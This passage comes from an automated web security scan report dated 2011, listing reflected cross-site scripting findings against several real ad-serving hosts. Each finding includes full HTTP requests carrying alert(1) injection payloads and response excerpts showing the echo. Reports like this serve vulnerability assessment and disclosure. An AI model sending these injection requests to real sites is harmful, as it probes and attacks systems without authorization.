Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.nbcnewyork.com/news/local/Helicopter-Crash-East-River-Death-Tourist-Rescue-Victims-Bloomberg--131125518.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ID=OPT_OUT

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 18:20:53 GMT
Server: Apache
Cache-Control: no-cache, must-revalidate
Expires: Tue, 1 Jan 1970 01:01:01 GMT
Pragma: no-cache
P3P: policyref="http://ad.adlegend.com/p3p.xml", CP="BUS COM COR DEVa DSP NAV NOI OUR PRE STA TAIa UNI"
x_transtrans: 42.6.10.688
Set-Cookie: PrefID=deleted; path=/; domain=.adlegend.com; expires=Mon, 01 Feb 1999 01:01:01 GMT;
Set-Cookie: MLCursor=deleted; path=/; domain=.adlegend.com; expires=Mon, 01 Feb 1999 01:01:01 GMT;
Set-Cookie: MLCPrf=deleted; path=/; domain=.adlegend.com; expires=Mon, 01 Feb 1999 01:01:01 GMT;
Set-Cookie: MLDup=deleted; path=/; domain=.adlegend.com; expires=Mon, 01 Feb 1999 01:01:01 GMT;
Set-Cookie: CSList=deleted; path=/; domain=.adlegend.com; expires=Mon, 01 Feb 1999 01:01:01 GMT;
Set-Cookie: CTList=deleted; path=/; domain=.adlegend.com; expires=Mon, 01 Feb 1999 01:01:01 GMT;
Set-Cookie: XGIR=deleted; path=/; domain=.adlegend.com; expires=Mon, 01 Feb 1999 01:01:01 GMT;
Content-Type: application/x-javascript
Content-Length: 452
Connection: close

document.write('<A HREF="http://ad.adlegend.com/click.ng?spacedesc=2048146_1080838_300x160_1136436_2048146&af=1120340&ml_pkgkw=-%253A%2522%2522&ml_pbi=-2048146&ml_camp=1076702&ml_crid=2148579&click=&9121b'-alert(1)-'fc30105dd5d=1http://www.nbc.com/up-all-night/" TARGET="_blank">
...[SNIP]...

3.3. http://ad.adlegend.com/jscript [target parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.adlegend.com
Path:   /jscript

Issue detail

The value of the target request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9ab84'%3balert(1)//f4b857f52a7 was submitted in the target parameter. This input was echoed as 9ab84';alert(1)//f4b857f52a7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jscript?spacedesc=2048146_1080838_300x160_1136436_2048146&ML_NIF=N&target=_blank9ab84'%3balert(1)//f4b857f52a7&@CPSC@= HTTP/1.1
Host: ad.adlegend.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.nbcnewyork.com/news/local/Helicopter-Crash-East-River-Death-Tourist-Rescue-Victims-Bloomberg--131125518.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ID=OPT_OUT

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 18:20:50 GMT
Server: Apache
Cache-Control: no-cache, must-revalidate
Expires: Tue, 1 Jan 1970 01:01:01 GMT
Pragma: no-cache
P3P: policyref="http://ad.adlegend.com/p3p.xml", CP="BUS COM COR DEVa DSP NAV NOI OUR PRE STA TAIa UNI"
x_transtrans: 42.6.10.688
Set-Cookie: PrefID=deleted; path=/; domain=.adlegend.com; expires=Mon, 01 Feb 1999 01:01:01 GMT;
Set-Cookie: MLCursor=deleted; path=/; domain=.adlegend.com; expires=Mon, 01 Feb 1999 01:01:01 GMT;
Set-Cookie: MLCPrf=deleted; path=/; domain=.adlegend.com; expires=Mon, 01 Feb 1999 01:01:01 GMT;
Set-Cookie: MLDup=deleted; path=/; domain=.adlegend.com; expires=Mon, 01 Feb 1999 01:01:01 GMT;
Set-Cookie: CSList=deleted; path=/; domain=.adlegend.com; expires=Mon, 01 Feb 1999 01:01:01 GMT;
Set-Cookie: CTList=deleted; path=/; domain=.adlegend.com; expires=Mon, 01 Feb 1999 01:01:01 GMT;
Set-Cookie: XGIR=deleted; path=/; domain=.adlegend.com; expires=Mon, 01 Feb 1999 01:01:01 GMT;
Content-Type: application/x-javascript
Content-Length: 449
Connection: close

document.write('<A HREF="http://ad.adlegend.com/click.ng?spacedesc=2048146_1080838_300x160_1136436_2048146&af=1120340&ml_pkgkw=-%253A%2522%2522&ml_pbi=-2048146&ml_camp=1076702&ml_crid=2148579&click=http://www.nbc.com/up-all-night/" TARGET="_blank9ab84';alert(1)//f4b857f52a7">
...[SNIP]...

3.4. http://ad.burstdirectads.com/st [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.burstdirectads.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21da1"><script>alert(1)</script>a1f0873c55 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /st?ad_type=iframe&ad_size=300x250&section=2551311&bur=81736&x=http://www.burstnet.com/ads/ad18241a-map.cgi/BCPG175221.253830.503405/VTS=3X3qJ.u_y6/SZ=300X250A/V=2.3S//ST=0Ok20i9I10y320qZ1oPTEB2_3S02vc02vc/REDIRURL=&21da1"><script>alert(1)</script>a1f0873c55=1 HTTP/1.1
Host: ad.burstdirectads.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.multiplayergames.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 20:47:20 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Wed, 05 Oct 2011 20:47:20 GMT
Pragma: no-cache
Age: 0
Proxy-Connection: keep-alive
Content-Length: 5345

<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=
...[SNIP]...
<a href="http://ad.burstdirectads.com/imageclick?21da1"><script>alert(1)</script>a1f0873c55=1&Z=300x250&bur=81736&s=2551311&x=http%3a%2f%2fwww.burstnet.com%2fads%2fad18241a%2dmap.cgi%2fBCPG175221.253830.503405%2fVTS%3d3X3qJ.u%5fy6%2fSZ%3d300X250A%2fV%3d2.3S%2f%2fST%3d0Ok20i9I10y320qZ1oPTEB2%
...[SNIP]...

3.5. http://ad.burstdirectads.com/st [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.burstdirectads.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7b318"-alert(1)-"43e5161bf84 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?ad_type=iframe&ad_size=300x250&section=2551311&bur=81736&x=http://www.burstnet.com/ads/ad18241a-map.cgi/BCPG175221.253830.503405/VTS=3X3qJ.u_y6/SZ=300X250A/V=2.3S//ST=0Ok20i9I10y320qZ1oPTEB2_3S02vc02vc/REDIRURL=&7b318"-alert(1)-"43e5161bf84=1 HTTP/1.1
Host: ad.burstdirectads.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.multiplayergames.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 20:47:20 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Wed, 05 Oct 2011 20:47:20 GMT
Pragma: no-cache
Age: 0
Proxy-Connection: keep-alive
Content-Length: 5303

<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "iframe"; rm_url = "http://ad.burstdirectads.com/imp?7b318"-alert(1)-"43e5161bf84=1&Z=300x250&bur=81736&s=2551311&x=http%3a%2f%2fwww.burstnet.com%2fads%2fad18241a%2dmap.cgi%2fBCPG175221.253830.503405%2fVTS%3d3X3qJ.u%5fy6%2fSZ%3d300X250A%2fV%3d2.3S%2f%2fST%3d0Ok20i9I10y320qZ1oPTEB2%
...[SNIP]...

3.6. http://ads.pointroll.com/PortalServe/ [dom parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The value of the dom request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9b2b1"%3balert(1)//d406693461b was submitted in the dom parameter. This input was echoed as 9b2b1";alert(1)//d406693461b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /PortalServe/?pid=1409315L44120110908171336&flash=10&time=3|13:21|-5&redir=http://iv.doubleclick.net/click%3Bh%3Dv8/3b97/3/0/%2a/o%3B243504980%3B1-0%3B1%3B60663747%3B4986-300/600%3B44392852/44410639/1%3B%3B%7Eokv%3D%3B%21category%3Dny%3B%21category%3Dthe-scene%3B%21category%3Dbottom%3Bsite%3Dny%3Bpid%3D%3Bsect%3Dthe-scene%3Bsub%3Dthe-scene-index%3Bsub2%3D%3Bcontentid%3D%3Bkw%3D%3BmtfIFPath%3D/includes/%3Btile%3D3%3Bpos%3D2%3Bsz%3D300x250%2C300x600%3B%21category%3Drefresh%3Brefresh%3Dtrue%3Bpm%3D1%3Blsg%3D22368%3B%7Eaopt%3D2/0/b2/0%3B%7Esscs%3D%3f$CTURL$&pos=x&dom=http://www.nbcnewyork.com9b2b1"%3balert(1)//d406693461b&r=0.38880528369918466 HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://iv.doubleclick.net/adi/nbcu.lim.ny/the-scene-index;!category=ny;!category=the-scene;!category=bottom;site=ny;pid=;sect=the-scene;sub=the-scene-index;sub2=;contentid=;kw=;mtfIFPath=/includes/;tile=3;pos=2;sz=300x250,300x600;!category=refresh;refresh=true;pm=1;lsg=22368;ord=533318422036?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRID=FC84F463-F810-4805-B5C6-DA875B835084; PRbu=ErB40RtCA; F1FuWM=4*1317839769; F1GBxd=1*1317852302; PRvt=CKJ9xErENUwPwYAcUBBeJ6TErNHYxA5IBd7BCeJ5DErTb9CAIFAC9BBeJ7WErTb9avgKAAGBBeJNRErllKsxwcASKBBeKG9ErlmBbHqUAB3BAeKMrErn3uJDv8AEUBAeJP7Ern6nyhcfADrBBeJyuEro4I5LOiABWBAeKJcEro4f5YWRAMZBAe; PRgo=BBBAAsJvCBVBF4FRCDhFS!B; PRimp=8EAE0400-3F59-124F-1209-1FB0026B0100; PRca=|AKoY*9320:1|AJil*562:2|AK0w*562:2|AKAH*47:1|AJrB*1871:1|AKrj*1495:1|AKmB*47:5|AJvZ*396:1|AKkS*9227:1|AKlp*1278:1|AJoR*343:1|AKjB*15:2|AK9q*1646:2|AK73*1646:1|AKdX*1153:2|AKfC*298:1|AK8l*9320:1|AJtM*1737:2|AJsM*154:1|AKln*9320:3|AKgy*39173:1|AKfq*9:2|AKcV*1774:3|#; PRcp=|AKoYAC0U:1|AJilAAJE:2|AK0wAAJE:2|AKAHAAAl:1|AJrBAA4L:1|AKrjAAYH:1|AKmBAAAl:5|AJvZAAGY:1|AKkSACYp:1|AKlpAAUc:1|AJoRAAF7:1|AKjBAAF7:1|AKjBAAAP:1|AK9qAA08:2|AK73AA08:1|AKdXAASb:2|AKfCAAEo:1|AK8lAC0U:1|AJtMAA2B:2|AJsMAAC4:1|AKlnAC0U:3|AKgyAKLp:1|AKfqAAQ0:1|AKfqAAAJ:1|AKcVAA2c:3|#; PRpl=|FvLB:1|ErY8:2|Fc3m:2|GBoD:1|GBxd:1|Etx2:1|GBJ0:1|FuWM:4|EvC9:1|Fyu4:1|FsBu:1|FiNl:1|FwPI:1|FwO9:1|FeMB:1|FeMC:1|FdKz:1|FjZG:1|Fj1N:1|FnKl:1|Fgi2:1|FrMI:1|FrMW:1|F2Bj:1|FrlJ:3|Fqr0:1|Fqqc:1|Fqqq:1|Fhqf:3|#; PRcr=|GXmL:1|GJup:2|GQzk:2|GKY8:1|GSVD:1|GZZh:1|GZPz:1|GZZd:2|GZZc:2|Fz04:1|GY7h:1|GWZl:1|Fz7o:1|GYaN:2|GRns:1|GRno:1|GRQ2:1|GUPB:1|GUPA:1|GVWz:1|GWPi:1|GJ9J:1|GMBD:1|GMud:1|GW7X:3|GV2B:1|GV12:2|GSur:3|#; PRpc=|FvLBGXmL:1|ErY8GJup:2|Fc3mGQzk:2|GBoDGKY8:1|GBxdGZZc:1|Etx2GSVD:1|FuWMGZZh:1|GBJ0GZPz:1|FuWMGZZd:2|FuWMGZZc:1|EvC9Fz04:1|Fyu4GY7h:1|FsBuGWZl:1|FiNlFz7o:1|FwPIGYaN:1|FwO9GYaN:1|FeMBGRns:1|FeMCGRno:1|FdKzGRQ2:1|FjZGGUPB:1|Fj1NGUPA:1|FnKlGVWz:1|Fgi2GWPi:1|FrMIGJ9J:1|FrMWGMBD:1|F2BjGMud:1|FrlJGW7X:3|Fqr0GV2B:1|FqqcGV12:1|FqqqGV12:1|FhqfGSur:3|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 05 Oct 2011 18:21:16 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Cache-Control: no-cache

document.write("<iframe id='profr1409315' src='http://ads.pointroll.com/PortalServe/?pid=1409315L44120110908171336&cid=1512616&pos=h&redir=http://iv.doubleclick.net/click%3Bh=v8/3b97/3/0/*/o%3B2435049
...[SNIP]...
=%3Bcontentid=%3Bkw=%3BmtfIFPath=/includes/%3Btile=3%3Bpos=2%3Bsz=300x250,300x600%3B!category=refresh%3Brefresh=true%3Bpm=1%3Blsg=22368%3B~aopt=2/0/b2/0%3B~sscs=%3F$CTURL$&dom=http://www.nbcnewyork.com9b2b1";alert(1)//d406693461b&time=3|13:21|-5&r=0.38880528369918466&flash=10&server=polRedir' width='300' height='600' frameborder='0' marginwidth='0' marginheight='0' scrolling='NO'>
...[SNIP]...

3.7. http://ads.pointroll.com/PortalServe/ [flash parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The value of the flash request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload da339'%3balert(1)//9d27b7a2543 was submitted in the flash parameter. This input was echoed as da339';alert(1)//9d27b7a2543 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /PortalServe/?pid=1409315L44120110908171336&flash=10da339'%3balert(1)//9d27b7a2543&time=3|13:21|-5&redir=http://iv.doubleclick.net/click%3Bh%3Dv8/3b97/3/0/%2a/o%3B243504980%3B1-0%3B1%3B60663747%3B4986-300/600%3B44392852/44410639/1%3B%3B%7Eokv%3D%3B%21category%3Dny%3B%21category%3Dthe-scene%3B%21category%3Dbottom%3Bsite%3Dny%3Bpid%3D%3Bsect%3Dthe-scene%3Bsub%3Dthe-scene-index%3Bsub2%3D%3Bcontentid%3D%3Bkw%3D%3BmtfIFPath%3D/includes/%3Btile%3D3%3Bpos%3D2%3Bsz%3D300x250%2C300x600%3B%21category%3Drefresh%3Brefresh%3Dtrue%3Bpm%3D1%3Blsg%3D22368%3B%7Eaopt%3D2/0/b2/0%3B%7Esscs%3D%3f$CTURL$&pos=x&dom=http://www.nbcnewyork.com&r=0.38880528369918466 HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://iv.doubleclick.net/adi/nbcu.lim.ny/the-scene-index;!category=ny;!category=the-scene;!category=bottom;site=ny;pid=;sect=the-scene;sub=the-scene-index;sub2=;contentid=;kw=;mtfIFPath=/includes/;tile=3;pos=2;sz=300x250,300x600;!category=refresh;refresh=true;pm=1;lsg=22368;ord=533318422036?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRID=FC84F463-F810-4805-B5C6-DA875B835084; PRbu=ErB40RtCA; F1FuWM=4*1317839769; F1GBxd=1*1317852302; PRvt=CKJ9xErENUwPwYAcUBBeJ6TErNHYxA5IBd7BCeJ5DErTb9CAIFAC9BBeJ7WErTb9avgKAAGBBeJNRErllKsxwcASKBBeKG9ErlmBbHqUAB3BAeKMrErn3uJDv8AEUBAeJP7Ern6nyhcfADrBBeJyuEro4I5LOiABWBAeKJcEro4f5YWRAMZBAe; PRgo=BBBAAsJvCBVBF4FRCDhFS!B; PRimp=8EAE0400-3F59-124F-1209-1FB0026B0100; PRca=|AKoY*9320:1|AJil*562:2|AK0w*562:2|AKAH*47:1|AJrB*1871:1|AKrj*1495:1|AKmB*47:5|AJvZ*396:1|AKkS*9227:1|AKlp*1278:1|AJoR*343:1|AKjB*15:2|AK9q*1646:2|AK73*1646:1|AKdX*1153:2|AKfC*298:1|AK8l*9320:1|AJtM*1737:2|AJsM*154:1|AKln*9320:3|AKgy*39173:1|AKfq*9:2|AKcV*1774:3|#; PRcp=|AKoYAC0U:1|AJilAAJE:2|AK0wAAJE:2|AKAHAAAl:1|AJrBAA4L:1|AKrjAAYH:1|AKmBAAAl:5|AJvZAAGY:1|AKkSACYp:1|AKlpAAUc:1|AJoRAAF7:1|AKjBAAF7:1|AKjBAAAP:1|AK9qAA08:2|AK73AA08:1|AKdXAASb:2|AKfCAAEo:1|AK8lAC0U:1|AJtMAA2B:2|AJsMAAC4:1|AKlnAC0U:3|AKgyAKLp:1|AKfqAAQ0:1|AKfqAAAJ:1|AKcVAA2c:3|#; PRpl=|FvLB:1|ErY8:2|Fc3m:2|GBoD:1|GBxd:1|Etx2:1|GBJ0:1|FuWM:4|EvC9:1|Fyu4:1|FsBu:1|FiNl:1|FwPI:1|FwO9:1|FeMB:1|FeMC:1|FdKz:1|FjZG:1|Fj1N:1|FnKl:1|Fgi2:1|FrMI:1|FrMW:1|F2Bj:1|FrlJ:3|Fqr0:1|Fqqc:1|Fqqq:1|Fhqf:3|#; PRcr=|GXmL:1|GJup:2|GQzk:2|GKY8:1|GSVD:1|GZZh:1|GZPz:1|GZZd:2|GZZc:2|Fz04:1|GY7h:1|GWZl:1|Fz7o:1|GYaN:2|GRns:1|GRno:1|GRQ2:1|GUPB:1|GUPA:1|GVWz:1|GWPi:1|GJ9J:1|GMBD:1|GMud:1|GW7X:3|GV2B:1|GV12:2|GSur:3|#; PRpc=|FvLBGXmL:1|ErY8GJup:2|Fc3mGQzk:2|GBoDGKY8:1|GBxdGZZc:1|Etx2GSVD:1|FuWMGZZh:1|GBJ0GZPz:1|FuWMGZZd:2|FuWMGZZc:1|EvC9Fz04:1|Fyu4GY7h:1|FsBuGWZl:1|FiNlFz7o:1|FwPIGYaN:1|FwO9GYaN:1|FeMBGRns:1|FeMCGRno:1|FdKzGRQ2:1|FjZGGUPB:1|Fj1NGUPA:1|FnKlGVWz:1|Fgi2GWPi:1|FrMIGJ9J:1|FrMWGMBD:1|F2BjGMud:1|FrlJGW7X:3|Fqr0GV2B:1|FqqcGV12:1|FqqqGV12:1|FhqfGSur:3|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 05 Oct 2011 18:21:12 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Cache-Control: no-cache

location.replace('http://www.nbcnewyork.com/includes/PointRollAds.htm?pid=1409315L44120110908171336&redir=http://iv.doubleclick.net/click%3Bh=v8/3b97/3/0/*/o%3B243504980%3B1-0%3B1%3B60663747%3B4986-30
...[SNIP]...
Bsub2=%3Bcontentid=%3Bkw=%3BmtfIFPath=/includes/%3Btile=3%3Bpos=2%3Bsz=300x250,300x600%3B!category=refresh%3Brefresh=true%3Bpm=1%3Blsg=22368%3B~aopt=2/0/b2/0%3B~sscs=%3F$CTURL$&time=3|13:21|-5&flash=10da339';alert(1)//9d27b7a2543&server=portalserve&bu=437627563');

3.8. http://ads.pointroll.com/PortalServe/ [redir parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The value of the redir request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9ef9e'-alert(1)-'3f0794b59ee was submitted in the redir parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /PortalServe/?pid=1409315L44120110908171336&flash=10&time=3|13:21|-5&redir=http://iv.doubleclick.net/click%3Bh%3Dv8/3b97/3/0/%2a/o%3B243504980%3B1-0%3B1%3B60663747%3B4986-300/600%3B44392852/44410639/1%3B%3B%7Eokv%3D%3B%21category%3Dny%3B%21category%3Dthe-scene%3B%21category%3Dbottom%3Bsite%3Dny%3Bpid%3D%3Bsect%3Dthe-scene%3Bsub%3Dthe-scene-index%3Bsub2%3D%3Bcontentid%3D%3Bkw%3D%3BmtfIFPath%3D/includes/%3Btile%3D3%3Bpos%3D2%3Bsz%3D300x250%2C300x600%3B%21category%3Drefresh%3Brefresh%3Dtrue%3Bpm%3D1%3Blsg%3D22368%3B%7Eaopt%3D2/0/b2/0%3B%7Esscs%3D%3f$CTURL$9ef9e'-alert(1)-'3f0794b59ee&pos=x&dom=http://www.nbcnewyork.com&r=0.38880528369918466 HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://iv.doubleclick.net/adi/nbcu.lim.ny/the-scene-index;!category=ny;!category=the-scene;!category=bottom;site=ny;pid=;sect=the-scene;sub=the-scene-index;sub2=;contentid=;kw=;mtfIFPath=/includes/;tile=3;pos=2;sz=300x250,300x600;!category=refresh;refresh=true;pm=1;lsg=22368;ord=533318422036?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRID=FC84F463-F810-4805-B5C6-DA875B835084; PRbu=ErB40RtCA; F1FuWM=4*1317839769; F1GBxd=1*1317852302; PRvt=CKJ9xErENUwPwYAcUBBeJ6TErNHYxA5IBd7BCeJ5DErTb9CAIFAC9BBeJ7WErTb9avgKAAGBBeJNRErllKsxwcASKBBeKG9ErlmBbHqUAB3BAeKMrErn3uJDv8AEUBAeJP7Ern6nyhcfADrBBeJyuEro4I5LOiABWBAeKJcEro4f5YWRAMZBAe; PRgo=BBBAAsJvCBVBF4FRCDhFS!B; PRimp=8EAE0400-3F59-124F-1209-1FB0026B0100; PRca=|AKoY*9320:1|AJil*562:2|AK0w*562:2|AKAH*47:1|AJrB*1871:1|AKrj*1495:1|AKmB*47:5|AJvZ*396:1|AKkS*9227:1|AKlp*1278:1|AJoR*343:1|AKjB*15:2|AK9q*1646:2|AK73*1646:1|AKdX*1153:2|AKfC*298:1|AK8l*9320:1|AJtM*1737:2|AJsM*154:1|AKln*9320:3|AKgy*39173:1|AKfq*9:2|AKcV*1774:3|#; PRcp=|AKoYAC0U:1|AJilAAJE:2|AK0wAAJE:2|AKAHAAAl:1|AJrBAA4L:1|AKrjAAYH:1|AKmBAAAl:5|AJvZAAGY:1|AKkSACYp:1|AKlpAAUc:1|AJoRAAF7:1|AKjBAAF7:1|AKjBAAAP:1|AK9qAA08:2|AK73AA08:1|AKdXAASb:2|AKfCAAEo:1|AK8lAC0U:1|AJtMAA2B:2|AJsMAAC4:1|AKlnAC0U:3|AKgyAKLp:1|AKfqAAQ0:1|AKfqAAAJ:1|AKcVAA2c:3|#; PRpl=|FvLB:1|ErY8:2|Fc3m:2|GBoD:1|GBxd:1|Etx2:1|GBJ0:1|FuWM:4|EvC9:1|Fyu4:1|FsBu:1|FiNl:1|FwPI:1|FwO9:1|FeMB:1|FeMC:1|FdKz:1|FjZG:1|Fj1N:1|FnKl:1|Fgi2:1|FrMI:1|FrMW:1|F2Bj:1|FrlJ:3|Fqr0:1|Fqqc:1|Fqqq:1|Fhqf:3|#; PRcr=|GXmL:1|GJup:2|GQzk:2|GKY8:1|GSVD:1|GZZh:1|GZPz:1|GZZd:2|GZZc:2|Fz04:1|GY7h:1|GWZl:1|Fz7o:1|GYaN:2|GRns:1|GRno:1|GRQ2:1|GUPB:1|GUPA:1|GVWz:1|GWPi:1|GJ9J:1|GMBD:1|GMud:1|GW7X:3|GV2B:1|GV12:2|GSur:3|#; PRpc=|FvLBGXmL:1|ErY8GJup:2|Fc3mGQzk:2|GBoDGKY8:1|GBxdGZZc:1|Etx2GSVD:1|FuWMGZZh:1|GBJ0GZPz:1|FuWMGZZd:2|FuWMGZZc:1|EvC9Fz04:1|Fyu4GY7h:1|FsBuGWZl:1|FiNlFz7o:1|FwPIGYaN:1|FwO9GYaN:1|FeMBGRns:1|FeMCGRno:1|FdKzGRQ2:1|FjZGGUPB:1|Fj1NGUPA:1|FnKlGVWz:1|Fgi2GWPi:1|FrMIGJ9J:1|FrMWGMBD:1|F2BjGMud:1|FrlJGW7X:3|Fqr0GV2B:1|FqqcGV12:1|FqqqGV12:1|FhqfGSur:3|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 05 Oct 2011 18:21:14 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Cache-Control: no-cache

location.replace('http://www.nbcnewyork.com/includes/PointRollAds.htm?pid=1409315L44120110908171336&redir=http://iv.doubleclick.net/click%3Bh=v8/3b97/3/0/*/o%3B243504980%3B1-0%3B1%3B60663747%3B4986-30
...[SNIP]...
e%3Bsub=the-scene-index%3Bsub2=%3Bcontentid=%3Bkw=%3BmtfIFPath=/includes/%3Btile=3%3Bpos=2%3Bsz=300x250,300x600%3B!category=refresh%3Brefresh=true%3Bpm=1%3Blsg=22368%3B~aopt=2/0/b2/0%3B~sscs=%3F$CTURL$9ef9e'-alert(1)-'3f0794b59ee&time=3|13:21|-5&flash=10&server=portalserve&bu=3256613822');

3.9. http://ads.pointroll.com/PortalServe/ [time parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The value of the time request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7532b'%3balert(1)//4a891d65b27 was submitted in the time parameter. This input was echoed as 7532b';alert(1)//4a891d65b27 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

